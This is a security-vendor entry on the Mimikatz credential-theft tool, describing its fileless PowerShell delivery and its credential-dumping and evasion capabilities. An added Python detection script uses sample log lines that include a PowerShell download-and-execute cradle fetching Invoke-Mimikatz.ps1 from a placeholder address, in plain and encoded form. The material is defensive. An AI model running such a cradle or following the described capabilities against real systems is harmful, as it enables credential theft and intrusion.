
HackTool:Win32/Mikatz


First posted on 16 January 2017.
Source: Microsoft

Aliases:

There are no other names known for HackTool:Win32/Mikatz.

Explanation:

Installation

A special PowerShell script (Invoke-Mimikatz.ps1) allows PowerShell to perform remote fileless execution of this threat. In essence, fileless execution loads a binary into a process's address space without writing it to the hard disk. Because the binary is loaded directly into memory, it remains invisible to file-scanning antivirus solutions.

In a typical credential harvesting scenario, a malicious hacker runs a PowerShell command that causes the victim's machine to download the script from a malicious server.

Next, the downloaded script uses reflective DLL injection to load and run the threat remotely without storing any files on the disk of the compromised machine.

As a result, the malicious hacker can remotely leverage the threat to carry out malicious activity such as stealing credentials and certificates and collecting data from the compromised host.
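The installation chain above leaves a characteristic trace in PowerShell script-block logging (Event ID 4104) and process-creation auditing (Event ID 4688): a download cradle that pipes remote content straight into Invoke-Expression, the tool's own name, and references to LSASS. The following Python script is an added detection example written for this page; it is not part of the original Microsoft description and is not code from the tool. It scores constructed log lines against weighted indicators, decodes any -EncodedCommand argument (PowerShell passes UTF-16LE base64) before matching so that encoding does not hide the cradle, and treats a bare LSASS reference as too weak to flag on its own. The sample lines, the 203.0.113.10 address, the rule names and the weights are all assumptions made for the example.

```python
"""Triage PowerShell script-block / process-creation log lines for the fileless
Invoke-Mimikatz delivery pattern (added defender-side example, not from the page)."""
import base64
import binascii
import re
from typing import Dict, List, Tuple

# Weighted rules: every regex in a rule must match (case-insensitive) for it to fire.
# Weights and names are assumptions chosen for this example.
RULES: Dict[str, Tuple[int, List[str]]] = {
    "download-cradle-in-memory": (3, [r"downloadstring|downloadfile|invoke-webrequest|net\.webclient",
                                      r"\biex\b|invoke-expression"]),
    "known-tool-name": (5, [r"invoke-mimikatz|\bmimikatz\b"]),
    "reflective-loading": (2, [r"reflective"]),
    "lsass-reference": (2, [r"\blsass\b"]),   # low fidelity alone: admins legitimately touch lsass
}
COMPILED = {name: (w, [re.compile(p, re.I) for p in pats]) for name, (w, pats) in RULES.items()}

# powershell.exe accepts -e / -ec / -enc / -EncodedCommand followed by base64 of UTF-16LE text.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
FLAG_THRESHOLD = 3  # assumption: a single weak indicator (weight 2) is not enough to alert


def expand_encoded(text: str) -> str:
    """Return the line plus the decoded body of any -EncodedCommand argument,
    so the rules inspect the real script rather than its base64 wrapper."""
    out = text
    for m in ENCODED_ARG.finditer(text):
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            out += "\n" + raw.decode("utf-16-le", errors="ignore")
        except (binascii.Error, ValueError):
            continue  # not valid base64; keep the original text only
    return out


def score_line(line: str) -> Tuple[int, List[str]]:
    """Score one log line; returns (total weight, names of rules that fired)."""
    text = expand_encoded(line)
    hits = [name for name, (_, pats) in COMPILED.items() if all(p.search(text) for p in pats)]
    return sum(COMPILED[h][0] for h in hits), hits


def triage(lines: List[str]) -> List[Tuple[int, int, List[str]]]:
    """Return (line index, score, rules) for every line at or above FLAG_THRESHOLD."""
    flagged = []
    for i, line in enumerate(lines):
        score, hits = score_line(line)
        if score >= FLAG_THRESHOLD:
            flagged.append((i, score, hits))
    return flagged


# Constructed sample log lines (not real captures). 203.0.113.10 is a documentation address.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_LOGS = [
    "4104 ScriptBlockText: IEX (New-Object Net.WebClient).DownloadString"
    "('http://203.0.113.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz",
    "4104 ScriptBlockText: Get-ChildItem 'C:\\Users\\alice\\Documents' | Measure-Object",
    f"4688 CommandLine: powershell.exe -NoProfile -WindowStyle Hidden -enc {ENCODED}",
    "4104 ScriptBlockText: Get-Process lsass | Select-Object Id, WorkingSet",
]

if __name__ == "__main__":
    for idx, score, hits in triage(SAMPLE_LOGS):
        print(f"line {idx}: score={score} rules={hits}")
```

Lines 0 and 2 are flagged (the encoded cradle is only visible after decoding), while the `Get-Process lsass` line scores 2 and stays below the threshold; in practice the LSASS rule earns its keep when correlated with a cradle or injection indicator in the same session rather than as a stand-alone alert.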

Payload

This threat can:

  • Recover and export Windows passwords in clear-text by injecting a DLL into lsass.exe
  • Export security certificates
  • Fileless execution through PowerShell
  • Inject DLLs into running processes
  • List running system and user processes
  • Obtain all process tokens
  • Impersonate a token
  • Get a list with loaded kernel drivers
  • Get a table with all service calls and corresponding kernel modules names
  • Retrieve data about all callback modules that receive notifications for processes, images, threads, registry changes, objects, and file changes
  • BSOD the machine
  • Modify privileges
  • Bypass some Group Policy settings
  • Disable some security and event monitoring services
  • Bypass Microsoft AppLocker / Software Restriction Policies
  • Gather critical data for security and instrumentation software running on the host


Recover and export Windows credentials

This threat can dump credentials from LSASS (Windows Local Security Account database) including:
  • NT LAN Manager (NTLM) password hashes
  • LAN Manager password hashes
  • Kerberos password, ekeys, tickets, and PIN
  • TsPkg (password)
  • WDigest (clear-text password)
  • LiveSSP (clear-text password)
  • SSP (clear-text password)
  • DPAPI hashes and keys


It can also:
  • Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
  • Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
  • Export certificates and keys
  • Dump cached credentials
  • Stop event monitoring
  • Patch Terminal Server
  • Bypass basic Group Policy Objects




Due to the generic nature of this detection, we are unable to provide specific information about how the threat behaves.

Find out more about how we use machine learning to help guard against the latest malware threats:

Windows Defender: Rise of the machine (learning)

Last update 16 January 2017

 
